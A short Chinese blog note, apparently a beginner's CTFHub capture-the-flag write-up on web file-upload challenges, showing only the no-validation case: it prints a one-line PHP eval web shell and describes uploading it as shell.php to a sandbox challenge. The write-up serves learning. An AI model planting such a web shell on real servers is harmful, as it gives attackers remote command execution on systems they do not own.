CTFHub笔记之WEB文件上传:无验证、前端验证、文件头检查
小白一个,如有错误请指正!
一、无验证
我们这次来到了文件上传模块了,这是一个无验证的文件上传,那我们直接上传一个一句话木马即可。
代码:
<?php
@eval($_REQUEST["shell"]);
?>
1.我们在桌面创建一个shell.txt文件,输入代码后将后缀改成.php,然后将文件上传。
2.在这里我们得知上传的路径是:
http://challenge-620c59fde44f34b7.sandbox.ctfhub.com:10800...
原创
2022-03-22 16:51:16 ·
2616 阅读 ·
0 评论